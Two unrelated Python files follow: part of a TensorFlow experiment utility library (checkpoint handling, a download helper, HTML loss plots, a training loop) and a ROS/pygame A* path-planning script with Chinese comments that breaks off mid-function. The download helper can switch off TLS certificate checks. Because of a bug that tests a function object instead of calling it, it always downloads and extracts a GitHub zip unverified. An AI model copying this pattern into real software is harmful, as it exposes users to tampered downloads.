raise ValueError("Shapes for arguments to dot() are {} and {}, not supported!".format(a_tup, b_tup))
def scan(fn, sequences, outputs_info):
nonepos = [n for n, o in enumerate(outputs_info) if o is None]
nonnone = [o for o in outputs_info if o is not None]
sequences_and_nonnone = sequences + nonnone
sliced = [s[0] for s in sequences] + nonnone
inf_ret = fn(*sliced)
if len(outputs_info) < len(inf_ret):
raise ValueError("More outputs from `fn` than elements in outputs_info. Expected {} outs, given outputs_info of length {}, but `fn` returns {}. Pass None in outputs_info for returns which don't accumulate".format(len(outputs_info), len(outputs_info), len(inf_ret)))
initializers = []
for n in range(len(outputs_info)):
if outputs_info[n] is not None:
initializers.append(outputs_info[n])
else:
initializers.append(0. * inf_ret[n])
def wrapwrap(nonepos, initializers):
type_class = "list" if isinstance(initializers, list) else "tuple"
def fnwrap(accs, inps):
inps_then_accs = inps + [a for n, a in enumerate(accs) if n not in nonepos]
fn_rets = fn(*inps_then_accs)
return [fr for fr in fn_rets]
return fnwrap
this_fn = wrapwrap(nonepos, initializers)
r = tf.scan(this_fn, sequences, initializers)
return r
# universal time
tt = str(time.time()).split(".")[0]
def get_time_string():
return tt
def get_name():
base = str(uuid.uuid4())
return base
def get_script():
py_file = None
for argv in sys.argv[::-1]:
if argv[-3:] == ".py":
py_file = argv
# slurm_script
elif "slurm_" in argv:
py_file = argv
if "slurm" in py_file:
script_name = os.environ['SLURM_JOB_NAME']
script_name = script_name.split(".")[0]
else:
assert py_file is not None
script_path = os.path.abspath(py_file)
script_name = script_path.split(os.path.sep)[-1].split(".")[0]
# gotta play games for slurm runner
return script_name
# decided at import, should be consistent over training
checkpoint_uuid = get_name()[:6]
def get_checkpoint_uuid():
return checkpoint_uuid
def set_checkpoint_uuid(uuid_str):
logger.info("Setting global dagbldr uuid to %s" % uuid_str)
global checkpoint_uuid
checkpoint_uuid = uuid_str
checkpoint_import_time = time.strftime("%H-%M-%S_%Y-%d-%m", time.gmtime())
def get_checkpoint_import_time():
return checkpoint_import_time
def set_checkpoint_import_time(time_str):
logger.info("Setting global dagbldr import time to %s" % time_str)
global checkpoint_import_time
checkpoint_import_time = time_str
def _special_check(verbose=True):
ip_addr = socket.gethostbyname(socket.gethostname())
subnet = ".".join(ip_addr.split(".")[:-1])
whitelist = ["132.204.24", "132.204.25", "132.204.26", "132.204.27"]
subnet_match = [subnet == w for w in whitelist]
hostname = socket.gethostname()
if hostname == "mila00":
# edge case for mila00
subnet_match = [True]
if any(subnet_match):
if verbose:
logger.info("Found special runtime environment!")
logger.info("IP address: %s" % ip_addr)
logger.info("Hostname: %s" % hostname)
return True
else:
return False
default_seed = 2899
tf.set_random_seed(default_seed)
logger.info("Setting tensorflow default seed to {}".format(default_seed))
USER = os.getenv("USER")
def get_tfbldr_models_dir(special_check=True, verbose=True):
checkpoint_dir = os.getenv("TFBLDR_MODELS", os.path.join(
os.path.expanduser("~"), "tfbldr_models"))
# Figure out if this is necessary to run on localdisk @ U de M
if special_check and _special_check(verbose=verbose):
checkpoint_dir = "/Tmp/" + USER + "/tfbldr_models"
return checkpoint_dir
def get_tfbldr_cache_dir():
local_cache_dir = "/Tmp/" + USER + "/tfbldr_cache/"
if not os.path.exists(local_cache_dir):
os.mkdir(local_cache_dir)
return local_cache_dir
def get_tfbldr_lookup_dir():
lookup_dir = os.getenv("TFBLDR_LOOKUP", os.path.join(
os.path.expanduser("~"), "tfbldr_lookup"))
if not os.path.exists(lookup_dir):
logger.info("TFBLDR_LOOKUP directory {} not found, creating".format(lookup_dir))
os.mkdir(lookup_dir)
return lookup_dir
def _hash_file(fpath):
assert os.path.exists(fpath)
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
return str(md5(fpath))
def write_tfbldr_lookup_file(script_path=None):
gcu = get_checkpoint_uuid()
gcit = get_checkpoint_import_time()
hostname = socket.gethostname()
lookup_path = get_tfbldr_lookup_dir()
if script_path is None:
script_name = get_script()
full_script_path = os.path.abspath(script_name) + ".py"
else:
# this edge case only for making new lookups. Not recommended
script_name = script_path.split(os.sep)[-1][:-3]
full_script_path = script_path
hsh = _hash_file(full_script_path)
info_dict = {}
info_dict["name"] = script_name
info_dict["run_path"] = full_script_path
info_dict["hostname"] = hostname
info_dict["uuid"] = gcu
info_dict["import_time"] = gcit
info_dict["script_hash"] = hsh
save_path = os.path.join(lookup_path, "%s_%s.json" % (gcu, script_name))
logger.info("Saving tfbldr lookup in %s" % save_path)
with open(save_path, "w") as f:
json.dump(info_dict, f)
def get_checkpoint_dir(checkpoint_dir=None, folder=None, create_dir=True):
""" Get checkpoint directory path """
if checkpoint_dir is None:
checkpoint_dir = get_tfbldr_models_dir()
if folder is None:
checkpoint_name = get_script()
checkpoint_import_time = get_checkpoint_import_time()
checkpoint_uuid = get_checkpoint_uuid()
tmp = checkpoint_dir + os.path.sep + checkpoint_name + "_" + checkpoint_import_time + "_" + checkpoint_uuid
checkpoint_dir = tmp
else:
checkpoint_dir = os.path.join(checkpoint_dir, folder)
if not os.path.exists(checkpoint_dir) and create_dir:
os.makedirs(checkpoint_dir)
return checkpoint_dir
def get_resource_dir(name):
""" Get dataset directory path """
# Only used for JS downloader
resource_dir = get_tfbldr_models_dir(verbose=False)
resource_dir = os.path.join(resource_dir, name)
if not os.path.exists(resource_dir):
os.makedirs(resource_dir)
return resource_dir
def zip_dir(src, dst):
zf = zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED)
abs_src = os.path.abspath(src)
exclude_exts = [".js", ".pyc", ".html", ".txt", ".csv", ".gz"]
for root, dirs, files in os.walk(src):
for fname in files:
if all([e not in fname for e in exclude_exts]):
absname = os.path.abspath(os.path.join(root, fname))
arcname = "tfbldr" + os.sep + absname[len(abs_src) + 1:]
zf.write(absname, arcname)
zf.close()
def archive_tfbldr():
checkpoint_dir = get_checkpoint_dir()
code_snapshot_dir = checkpoint_dir + os.path.sep + "code_snapshot"
if not os.path.exists(code_snapshot_dir):
os.mkdir(code_snapshot_dir)
command_string = get_script() + ".py "
command_string += " ".join(sys.argv[1:])
command_script_path = code_snapshot_dir + os.path.sep + "run.sh"
if not os.path.exists(command_script_path):
with open(command_script_path, 'w') as f:
f.writelines(command_string)
save_script_path = code_snapshot_dir + os.path.sep + get_script() + ".py"
lib_dir = str(os.sep).join(save_script_path.split(os.sep)[:-2])
save_lib_path = code_snapshot_dir + os.path.sep + "tfbldr_archive.zip"
existing_reports = glob.glob(os.path.join(checkpoint_dir, "*.html"))
#existing_models = glob.glob(os.path.join(checkpoint_dir, "*.pkl"))
#empty = all([len(l) == 0 for l in (existing_reports, existing_models)])
empty = len(existing_reports) == 0
#if not empty:
# print("it already exists")
# from IPython import embed; embed(); raise ValueError()
if not os.path.exists(save_script_path) or empty:
logger.info("Saving code archive %s at %s" % (lib_dir, save_lib_path))
script_name = get_script() + ".py"
script_location = os.path.abspath(script_name)
shutil.copy2(script_location, save_script_path)
zip_dir(lib_dir, save_lib_path)
def coroutine(func):
def start(*args,**kwargs):
cr = func(*args,**kwargs)
cr.next()
return cr
return start
def download(url, server_fname, local_fname=None, progress_update_percentage=5,
bypass_certificate_check=False):
"""
An internet download utility modified from
http://stackoverflow.com/questions/22676/
how-do-i-download-a-file-over-http-using-python/22776#22776
"""
if bypass_certificate_check:
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
u = urllib.urlopen(url, context=ctx)
else:
u = urllib.urlopen(url)
if local_fname is None:
local_fname = server_fname
full_path = local_fname
meta = u.info()
with open(full_path, 'wb') as f:
try:
file_size = int(meta.get("Content-Length"))
except TypeError:
logger.info("WARNING: Cannot get file size, displaying bytes instead!")
file_size = 100
logger.info("Downloading: %s Bytes: %s" % (server_fname, file_size))
file_size_dl = 0
block_sz = int(1E7)
p = 0
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
if (file_size_dl * 100. / file_size) > p:
status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl *
100. / file_size)
logger.info(status)
p += progress_update_percentage
def filled_js_template_from_results_dict(results_dict, default_show="all"):
# Uses arbiter strings in the template to split the template and stick
# values in
partial_path = get_resource_dir("js_plot_dependencies")
full_path = os.path.join(partial_path, "master.zip")
url = "https://github.com/kastnerkyle/simple_template_plotter/archive/master.zip"
if not os.path.exists(full_path):
logger.info("Downloading plotter template code from %s" % url)
if _special_check:
download(url, full_path, bypass_certificate_check=True)
else:
download(url, full_path)
zip_ref = zipfile.ZipFile(full_path, 'r')
zip_ref.extractall(partial_path)
zip_ref.close()
js_path = os.path.join(partial_path, "simple_template_plotter-master")
template_path = os.path.join(js_path, "template.html")
f = open(template_path, mode='r')
all_template_lines = f.readlines()
f.close()
imports_split_index = [n for n, l in enumerate(all_template_lines)
if "IMPORTS_SPLIT" in l][0]
data_split_index = [n for n, l in enumerate(all_template_lines)
if "DATA_SPLIT" in l][0]
log_split_index = [n for n, l in enumerate(all_template_lines)
if "LOGGING_SPLIT" in l][0]
first_part = all_template_lines[:imports_split_index]
imports_part = []
js_files_path = os.path.join(js_path, "js")
js_file_names = ["jquery-1.9.1.js", "knockout-3.0.0.js",
"highcharts.js", "exporting.js"]
js_files = [os.path.join(js_files_path, jsf) for jsf in js_file_names]
for js_file in js_files:
with open(js_file, "r") as f:
imports_part.extend(
["<script>\n"] + f.readlines() + ["</script>\n"])
post_imports_part = all_template_lines[
imports_split_index + 1:data_split_index]
log_part = all_template_lines[data_split_index + 1:log_split_index]
last_part = all_template_lines[log_split_index + 1:]
def gen_js_field_for_key_value(key, values, show=True):
assert type(values) is list
if isinstance(values[0], (np.generic, np.ndarray)):
values = [float(v.ravel()) for v in values]
maxlen = 1500
if len(values) > maxlen:
values = list(np.interp(np.linspace(0, len(values), maxlen),
np.arange(len(values)), values))
show_key = "true" if show else "false"
return "{\n name: '%s',\n data: %s,\n visible: %s\n},\n" % (
str(key), str(values), show_key)
data_part = [gen_js_field_for_key_value(k, results_dict[k], True)
if k in default_show or default_show == "all"
else gen_js_field_for_key_value(k, results_dict[k], False)
for k in sorted(results_dict.keys())]
all_filled_lines = first_part + imports_part + post_imports_part
all_filled_lines = all_filled_lines + data_part + log_part
# add logging output
tmp = copy.copy(string_f)
tmp.seek(0)
log_output = tmp.readlines()
del tmp
all_filled_lines = all_filled_lines + log_output + last_part
return all_filled_lines
def save_results_as_html(save_path, results_dict, use_checkpoint_dir=True,
default_no_show="_auto", latest_tag=None):
show_keys = [k for k in results_dict.keys()
if default_no_show not in k]
as_html = filled_js_template_from_results_dict(
results_dict, default_show=show_keys)
if use_checkpoint_dir:
save_path = os.path.join(get_checkpoint_dir(), save_path)
logger.info("Saving HTML results %s" % save_path)
with open(save_path, "w") as f:
f.writelines(as_html)
if latest_tag is not None:
latest_path = os.path.join(get_checkpoint_dir(), latest_tag + "_latest.html")
if os.path.exists(latest_path):
os.remove(latest_path)
os.symlink(save_path, latest_path)
logger.info("Completed HTML results saving %s" % save_path)
@coroutine
def threaded_html_writer(interp=True, maxsize=25):
"""
Expects to be sent a tuple of (save_path, results_dict)
"""
messages = Queue.PriorityQueue(maxsize=maxsize)
def run_thread():
while True:
p, item = messages.get()
if item is GeneratorExit:
return
else:
save_path, results_dict = item
save_results_as_html(save_path, results_dict)
threading.Thread(target=run_thread).start()
try:
n = 0
while True:
item = (yield)
messages.put((n, item))
n -= 1
except GeneratorExit:
messages.put((1, GeneratorExit))
def run_loop(sess,
train_loop_function, train_itr,
valid_loop_function, valid_itr,
n_steps=np.inf,
n_train_steps_per=1000,
train_stateful_args=None,
n_valid_steps_per=50,
valid_stateful_args=None,
checkpoint_frequency=1000,
status_every_s=5,
models_to_keep=5):
"""
if restore_model:
model_file = tf.train.latest_checkpoint(os.path.join(restore_model, 'models'))
experiment_path = restore_model
epoch = int(model_file.split('-')[-1]) + 1
model_saver.restore(sess, model_file)
"""
sess.run(tf.global_variables_initializer())
write_tfbldr_lookup_file()
archive_tfbldr()
script = get_script()
hostname = socket.gethostname()
logger.info("Host %s, script %s" % (hostname, script))
train_itr_steps_taken = 0
valid_itr_steps_taken = 0
overall_train_loss = []
overall_valid_loss = []
# won't match exactly due to this - even after replaying itr stateful args may change
# however, should be *close* since data is at least iterated in the same way...
this_train_stateful_args = copy.deepcopy(train_stateful_args)
this_valid_stateful_args = copy.deepcopy(valid_stateful_args)
last_status = time.time()
model_saver = tf.train.Saver(max_to_keep=models_to_keep)
train_best_model_saver = tf.train.Saver(max_to_keep=models_to_keep)
valid_best_model_saver = tf.train.Saver(max_to_keep=models_to_keep)
checkpoint_dir = get_checkpoint_dir()
thw = threaded_html_writer()
cumulative_train_time = []
minibatch_train_time = []
minibatch_train_count = []
cumulative_valid_time = []
minibatch_valid_time = []
minibatch_valid_count = []
min_last_train_loss = np.inf
min_valid_loss = np.inf
was_best_valid_loss = False
while True:
# stop at the start of an epoch
if train_itr_steps_taken + 1 >= n_steps:
break
extras = {}
extras["train"] = True
assert n_train_steps_per >= 1
this_train_loss = []
train_start_time = time.time()
for tsi in range(n_train_steps_per):
s = time.time()
r = train_loop_function(sess, train_itr, extras, this_train_stateful_args)
e = time.time()
if train_stateful_args is not None:
this_train_stateful_args = r[-1]
train_loss = r[0]
# use the first loss returned to do train best checkpoint
if not hasattr(train_loss, "__len__"):
all_train_loss = [train_loss]
else:
all_train_loss = train_loss
train_loss = all_train_loss[0]
# should only happen for first mb of each epoch
if len(this_train_loss) < len(all_train_loss):
for i in range(len(all_train_loss)):
this_train_loss.append([])
# should only happen for first epoch
if len(overall_train_loss) < len(all_train_loss):
for i in range(len(all_train_loss)):
overall_train_loss.append([])
for i in range(len(all_train_loss)):
this_train_loss[i].append(all_train_loss[i])
minibatch_time = e - s
train_time_accumulator = 0 if len(cumulative_train_time) == 0 else cumulative_train_time[-1]
cumulative_train_time.append(minibatch_time + train_time_accumulator)
minibatch_train_time.append(minibatch_time)
train_summary = r[1]
train_itr_steps_taken += 1
minibatch_train_count.append(train_itr_steps_taken)
if (i + 1) == n_train_steps_per or (time.time() - last_status) > status_every_s:
logger.info("train step {}/{}, overall train step {}".format(tsi + 1, n_train_steps_per, train_itr_steps_taken))
for n, tl in enumerate(all_train_loss):
logger.info("train loss {} {}, overall train average {}".format(n + 1, tl, np.mean(overall_train_loss[n] + this_train_loss[n])))
logger.info(" ")
last_status = time.time()
for i in range(len(this_train_loss)):
overall_train_loss[i] += this_train_loss[i]
if train_loss < min_last_train_loss:
min_last_train_loss = train_loss
logger.info("had best train, step {}".format(train_itr_steps_taken))
train_best_model_saver.save(sess, os.path.join(checkpoint_dir, "models", "train_model"),
global_step=train_itr_steps_taken)
extras["train"] = False
if n_valid_steps_per > 0:
this_valid_loss = []
valid_start_time = time.time()
for vsi in range(n_valid_steps_per):
s = time.time()
r = valid_loop_function(sess, valid_itr, extras, this_valid_stateful_args)
e = time.time()
if valid_stateful_args is not None:
this_valid_stateful_args = r[-1]
valid_loss = r[0]
if not hasattr(valid_loss, "__len__"):
all_valid_loss = [valid_loss]
else:
all_valid_loss = valid_loss
valid_loss = all_valid_loss[0]
# should only happen for first mb of each epoch
if len(this_valid_loss) < len(all_valid_loss):
for i in range(len(all_valid_loss)):
this_valid_loss.append([])
# should only happen for first epoch
if len(overall_valid_loss) < len(all_valid_loss):
for i in range(len(all_valid_loss)):
overall_valid_loss.append([])
for i in range(len(all_valid_loss)):
this_valid_loss[i].append(all_valid_loss[i])
if valid_loss < min_valid_loss:
min_valid_loss = valid_loss
was_best_valid_loss = True
minibatch_time = e - s
valid_time_accumulator = 0 if len(cumulative_valid_time) == 0 else cumulative_valid_time[-1]
cumulative_valid_time.append(minibatch_time + valid_time_accumulator)
minibatch_valid_time.append(minibatch_time)
valid_summary = r[1]
valid_itr_steps_taken += 1
minibatch_valid_count.append(valid_itr_steps_taken)
if (i + 1) == n_valid_steps_per or (time.time() - last_status) > status_every_s:
logger.info("valid step {}/{}, overall valid step {}".format(vsi + 1, n_valid_steps_per, valid_itr_steps_taken))
for n, vl in enumerate(all_valid_loss):
logger.info("valid loss {} {}, overall valid average {}".format(n, vl, np.mean(overall_valid_loss[n] + this_valid_loss[n])))
logger.info(" ")
last_status = time.time()
for i in range(len(this_valid_loss)):
valid_interpd = [vi for vi in np.interp(np.arange(len(this_train_loss[i])), np.arange(len(this_valid_loss[i])), this_valid_loss[i])]
overall_valid_loss[i] += valid_interpd
if train_itr_steps_taken > 1E9:
save_html_path = "model_step_{}m.html".format(train_itr_steps_taken // 1E6)
if train_itr_steps_taken > 1E6:
save_html_path = "model_step_{}k.html".format(train_itr_steps_taken // 1E3)
else:
save_html_path = "model_step_{}.html".format(train_itr_steps_taken)
results_dict = {}
for i in range(len(overall_train_loss)):
results_dict["train_loss_{}".format(i)] = overall_train_loss[i]
results_dict["train_minibatch_time_auto"] = minibatch_train_time
results_dict["train_cumulative_time_auto"] = cumulative_train_time
results_dict["train_minibatch_count_auto"] = minibatch_train_count
# shortcut "and" to avoid edge case with no validation steps
if len(overall_valid_loss) > 0 and len(overall_valid_loss[0]) > 0:
for i in range(len(overall_valid_loss)):
results_dict["valid_loss_{}".format(i)] = overall_valid_loss[i]
results_dict["valid_minibatch_time_auto"] = minibatch_valid_time
results_dict["valid_cumulative_time_auto"] = cumulative_valid_time
results_dict["valid_minibatch_count_auto"] = minibatch_valid_count
thw.send((save_html_path, results_dict))
model_saver.save(sess, os.path.join(checkpoint_dir, "models", "model"),
global_step=train_itr_steps_taken)
if was_best_valid_loss:
logger.info("had best valid, step {}".format(train_itr_steps_taken))
valid_best_model_saver.save(sess, os.path.join(checkpoint_dir, "models", "valid_model"),
global_step=train_itr_steps_taken)
was_best_valid_loss = False
extras["train"] = True
logger.info("Training complete, exiting...")
|
decision3.py
|
#!/usr/bin/env python
#-*- coding:UTF-8 -*-
import math
import pygame
import time
import sensor_msgs.point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2
import rospy
from geometry_msgs.msg import Twist
import threading
from nav_msgs.msg import Odometry
# 定义全局变量:地图中节点的像素大小
CELL_WIDTH = 12 # 单元格宽度
CELL_HEIGHT = 12 # 单元格长度
BORDER_WIDTH = 0.5 # 边框宽度
REFLESH = 0.1 # 循环执行时间
MAPSIZE = 60 # 窗口尺寸
SCALE = 0.2 # 缩放量
MAXRANK = 3 # 最长记忆时间(单位:次)
class Color(object):
"""
定义颜色
"""
GRID = (190, 235, 243)
OBJECT = (65, 20, 243)
END = (255, 0, 0)
ROUTE = (255, 0, 0)
BLOCK = (0, 0, 0)
class Map(object):
def __init__(self, mapsize):
self.mapsize = mapsize
def generate_cell(self, cell_width, cell_height):
"""
定义一个生成器,用来生成地图中的所有节点坐标
:param cell_width: 节点宽度
:param cell_height: 节点长度
:return: 返回地图中的节点
"""
x_cell = -cell_width
for num_x in range(self.mapsize[0] // cell_width):
y_cell = -cell_height
x_cell += cell_width
for num_y in range(self.mapsize[1] // cell_height):
y_cell += cell_height
yield (x_cell, y_cell)
def transform(pos):
xnew, ynew = pos[0]*CELL_WIDTH, pos[1]*CELL_HEIGHT
return xnew, ynew
def floor_tuple(scale, pos=tuple()):
"""
将点云数据转换成适合的数据格式
:param scale: 缩放比例
:param pos: 未经离散化的连续型坐标
:return: 缩放、离散化以后的连续型坐标
"""
x = float(pos[0]/scale)
y = float(pos[1]/scale)
return tuple((math.floor(x), math.floor(y)))
class Block(object):
def __init__(self, pos):
self.pos = pos
self.rank = 0
def update(self):
self.rank = self.rank+1
class Blocklist(object):
"""
Blocklist类,接收来自点云的数据,离散化为一组元组,代表A*中的blocklist
2021.4.9更新:
Blocklist类新增记忆前三此点云数据功能,达到稳定点云图的目的。
为此新增Block类,作为blocklist中的基本元素元素。
包含两个值:pos-->坐标
rank-->等级[1,3],当rank>3时,将之从Blocklist中删除
Block类如上。
"""
def __init__(self, scale, point_cloud_data, pre_blocks, pre_blocklist, maxrank):
"""
初始化类,此类应该包含几个参数:
:param scale: 缩放比例
:param point_cloud_data: 原始点云数据
:param pre_blocks: 上一次处理后的blocks(由block组成)列表
:param pre_blocklist: 上一次处理后的blocklist(由block.pos组成)列表
:param maxrank 最长记忆时间(单位:次)
"""
self.scale = scale
self.maxrank = maxrank
self.pcd = point_cloud_data
self.now_blocks = pre_blocks # 最终应该是这次点云数据和p_b的合并
self.now_blocklist = pre_blocklist # 最终应该是这次点云数据和p_bl的合并
def pcd_discretization(self):
"""
2021.4.9更新:
为了达到本次更新所达到的效果,将此函数新增刷新block.rank、删除block功能
:return: 形式正确的now_blocklist
"""
# 添加,更新:
for tmp1 in self.pcd:
block_pos = floor_tuple(self.scale, tmp1) # todo 改进离散化函数
# 这里的blocklist起到了方便遍历的作用,但是最终是要用blocks刷新blocklist的
if block_pos not in self.now_blocklist:
self.now_blocklist.append(block_pos)
block = Block(block_pos)
self.now_blocks.append(block)
else:
for i in range(len(self.now_blocks)):
if self.now_blocks[i].pos == block_pos:
self.now_blocks[i].rank = 0
# 刷新,删除
n = len(self.now_blocks)
tmp2 = 0
while tmp2 < n:
try:
self.now_blocks[tmp2].update()
except KeyError:
break
# 其实这个try是多余的
if self.now_blocks[tmp2].rank > self.maxrank:
del self.now_blocks[tmp2]
tmp2 -= 1
n -= 1
tmp2 += 1
# 生成blocklist
self.now_blocklist = list()
for tmp3 in self.now_blocks:
self.now_blocklist.append(tmp3.pos)
return self.now_blocklist, self.now_blocks
# return list(map(lambda x: floor_tuple(self.scale, x), self.pcd))
# 两套方案,一种不不考虑重复,另一种考虑重复
@staticmethod
def clean(blocklist):
"""
这个函数没有实际意义,单纯就是为了可视化的时候block不会出现在(0,0)
"""
tmp = tuple((0, 0))
n = len(blocklist)
i = 0
while i < n:
if blocklist[i] == tmp:
del blocklist[i]
n = n-1
i = i-1
i += 1
return blocklist
# s = 0 # 单纯是为了验证前面的算法是否正确
# for x in blocklist:
# if x == tmp:
# s = s + 1
# print(s)
# return blocklist
class Visualization(object):
"""
点云数据可视化
虽然有自带软件的可视化,但是不是很满足项目的需求,我重写一个
"""
def __init__(self, blocklist, pos_now, pos_end, mapsize, routelist):
self.pos_now, self.pos_end, self.blocklist, self.routelist, self.mapsize = self.change_xy(pos_now,
pos_end,
blocklist,
routelist,
mapsize)
@staticmethod
def draw(mymap, screen, bl_pix, pix_now, pix_end, ro_pix):
# 绘制屏幕中的所有单元格
for (x, y) in mymap.generate_cell(CELL_WIDTH, CELL_HEIGHT):
if (x, y) in bl_pix:
# 绘制黑色的障碍物单元格,并留出2个像素的边框
pygame.draw.rect(screen, Color.BLOCK,
((x+BORDER_WIDTH, y+BORDER_WIDTH),
(CELL_WIDTH-2*BORDER_WIDTH, CELL_HEIGHT-2*BORDER_WIDTH))
)
elif (x, y) in ro_pix:
# 绘制规划路径
pygame.draw.rect(screen, Color.ROUTE,
((x+BORDER_WIDTH, y+BORDER_WIDTH),
(CELL_WIDTH-2*BORDER_WIDTH, CELL_HEIGHT-2*BORDER_WIDTH))
)
else:
# 绘制可通行单元格,并留出2个像素的边框
pygame.draw.rect(screen, Color.GRID,
((x+BORDER_WIDTH, y+BORDER_WIDTH),
(CELL_WIDTH-2*BORDER_WIDTH, CELL_HEIGHT-2*BORDER_WIDTH))
)
pygame.draw.circle(screen, Color.OBJECT,
(int(pix_now[0])+int(CELL_WIDTH//2), int(pix_now[1])+int(CELL_HEIGHT//2)), int(CELL_WIDTH//2) - 1)
pygame.draw.circle(screen, Color.END,
(int(pix_end[0])+int(CELL_WIDTH//2), int(pix_end[1])+int(CELL_HEIGHT//2)), int(CELL_WIDTH//2) - 1)
pygame.display.flip()
@staticmethod
def change_xy(pos_now, pos_end, blocklist, routelist, mapsize=50):
# 之前的可视化只有第一象限,现在改为四个象限,初始原点为(25,25)
mapsize = mapsize + 2
tmp = math.floor(mapsize/2)-1
pos_now = tuple((tmp+pos_now[0], tmp+pos_now[0]))
pos_end = tuple((tmp+pos_end[0], tmp+pos_end[1]))
blocklist = list(map(lambda block: tuple((tmp+block[0], tmp+block[1])), blocklist))
routelist = list(map(lambda route: tuple((tmp+route[0], tmp+route[1])), routelist))
return pos_now, pos_end, blocklist, routelist, mapsize
def visual(self):
# 初始化导入Pygame模块
pygame.init()
# 此处要将地图投影大小转换为像素大小,此处设地图中每个单元格的大小为CELL_WIDTH*CELL_HEIGHT像素
mymap = Map((self.mapsize*CELL_WIDTH, self.mapsize*CELL_HEIGHT))
# 初始化显示的窗口并设置尺寸
screen = pygame.display.set_mode((self.mapsize*CELL_WIDTH, self.mapsize*CELL_HEIGHT))
t_end = time.time() + REFLESH
while time.time() < t_end:
pygame.display.set_caption('example:')
bl_pix = list(map(transform, self.blocklist)) # 转换为像素
ro_pix = list(map(transform, self.routelist))
pix_now = (self.pos_now[0]*CELL_WIDTH, self.pos_now[1]*CELL_HEIGHT)
pix_end = (self.pos_end[0]*CELL_WIDTH, self.pos_end[1]*CELL_HEIGHT)
self.draw(mymap, screen, bl_pix, pix_now, pix_end, ro_pix)
class Node(object):
"""
定义节点类型,每一个节点类实际上包含了:
1.当前节点位置pos = (x,y)
2.当前节点从起点到当前节点CNode的实际最小距离gvalue = g(x)
3.当前状态下的目标函数fvalue = f(x)
4.当前节点的父节点位置
--顺便包含与上述数据有关的处理函数
""" # todo 改写目标函数的计算公式,寻找最优解
def __init__(self, pos):
self.pos = pos
self.father = None
self.gvalue = 0
self.fvalue = 0
def compute_fx(self, enode, father):
if not father:
print('??')
gx_father = father.gvalue # g'(n1)
# 采用欧式距离计算父节点到当前节点的距离 d(n1,n2)
gx_f2n = math.sqrt((father.pos[0] - self.pos[0])**2 + (father.pos[1] - self.pos[1])**2)
gvalue = gx_f2n + gx_father # 对于子节点的g(n2) = g(n1) + d(n1,n2)
# 利用欧式距离计算该点到终点的距离 h(n2)
hx_n2enode = math.sqrt((self.pos[0] - enode.pos[0])**2 + (self.pos[1] - enode.pos[1])**2)
fvalue = gvalue + hx_n2enode # f(n2) = h(n2) + g(n2)
return gvalue, fvalue
def set_fx(self, enode, father):
self.gvalue, self.fvalue = self.compute_fx(enode, father)
self.father = father
def update_fx(self, enode, father):
gvalue, fvalue = self.compute_fx(enode, father)
if fvalue < self.fvalue:
self.gvalue, self.fvalue = gvalue, fvalue
self.father = father
class AStar(object):
"""
AStar类,保存A*算法的主函数
输入:
1.地图大小(n*m)
2.当前点坐标(x,y) -- 原本应该是“起点坐标”,但是修改后改成当前点坐标
3.终点坐标(x,y)
还有个隐含的输入,即障碍物的坐标
输出与中间变量:
1.openist,当前节点周围所能寻找的点 todo 这里有问题:可能无法达到“预测路径”的初衷
2.closelist, 已经规划的点,即用来保存最优路径
3.blocklist,障碍物坐标
"""
def __init__(self, mapsize, pos_now, pos_en):
self.mapsize = mapsize # 表示地图的投影大小(n*n),并非屏幕上的地图像素大小
self.openlist, self.closelist, self.blocklist = [], [], []
# openlist 待搜索点
# closelist 已规划点
# blocklist 障碍物点
self.snode = Node(pos_now) # 存储当前点
self.enode = Node(pos_en) # 用于存储路径规划的目标节点
self.cnode = self.snode # 用于存储当前搜索到的节点
# 对于第一次而言就是加入起始点
def run(self): # 寻路主函数
self.openlist.append(self.snode)
while len(self.openlist) > 0:
# 查找openlist中fx最小的节点,此时fxlist中存储着待搜索点中所有的目标函数大小
# 定义起点的目标函数fx为0
fxlist = list(map(lambda x: x.fvalue, self.openlist))
# lambda匿名函数,返回x的目标函数大小,map函数将x对象(一个node类,包含它本身的所有信息)
# map函数有两个值,逗号前一项为一个函数,后一项为一个迭代器(迭代对象可能不止一个)
# 表明按顺序从中取出一个或多个元素传入函数中,并返回一个元组(默认是元组,但不改变迭代器内的对象类型)
# (大概)
index_min = fxlist.index(min(fxlist)) # 寻找出fxlist中目标函数最小的点
self.cnode = self.openlist[index_min] # openlist和fxlist中得元素一一对应,则最小值的下标也就是最小值点的索引
del self.openlist[index_min] # 在openlist中删除index_min节点
self.closelist.append(self.cnode) # 在closelist中加入index_min节点
# 扩展当前fx最小的节点,并进入下一次循环搜索
self._extend(self.cnode)
# 如果openlist列表为空,或者当前搜索节点为目标节点,则跳出循环
if len(self.openlist) == 0 or self.cnode.pos == self.enode.pos:
break
if self.cnode.pos == self.enode.pos:
self.enode.father = self.cnode.father
return self.closelist[1] # 返回下一步该走的位置
else:
return -1 # 停止不动
def get_minroute(self):
minroute = list()
current_node = self.enode
while True:
minroute.append(current_node.pos)
current_node = current_node.father # 这里的思想和Dijkstra算法类似,在返回路径的时候,返回其父节点
if current_node.pos == self.snode.pos: # 找到根节点
minroute.append(current_node.pos)
break
# minroute.put(self.snode.pos) # 加入父节点 暂且不要
return minroute
def _extend(self, cnode): # 作用是加入当前目标函数最小的节点周围不在closelist和blocklist中的节点进入openlist
nodes_neighbor = self.get_neighbor(cnode)
for node in nodes_neighbor:
# 判断节点node是否在closelist和blocklist中,因为closelist和blocklist中元素均为Node类,所以要用map函数转换为坐标集合
if node.pos in list(map(lambda x: x.pos, self.closelist)) or node.pos in self.blocklist:
continue
else:
if node.pos in list(map(lambda x: x.pos, self.openlist)):
node.update_fx(self.enode, cnode)
else:
node.set_fx(self.enode, cnode)
self.openlist.append(node)
def setblock(self, blocklist):
"""
获取地图中的障碍物节点,并存入self.blocklist列表中
注意:self.blocklist列表中存储的是障碍物坐标,不是Node类
"""
self.blocklist = list()
self.blocklist.extend(blocklist)
@staticmethod
def get_neighbor(cnode):
# offsets = [(-1, 1), (0, 1), (1, 1), (-1, 0), (1, 0), (-1, -1), (0, -1), (1, -1)] # 八面
offsets = [(-1, 0), (0, 1), (1, 0), (0, -1)] # 四面
nodes_neighbor = []
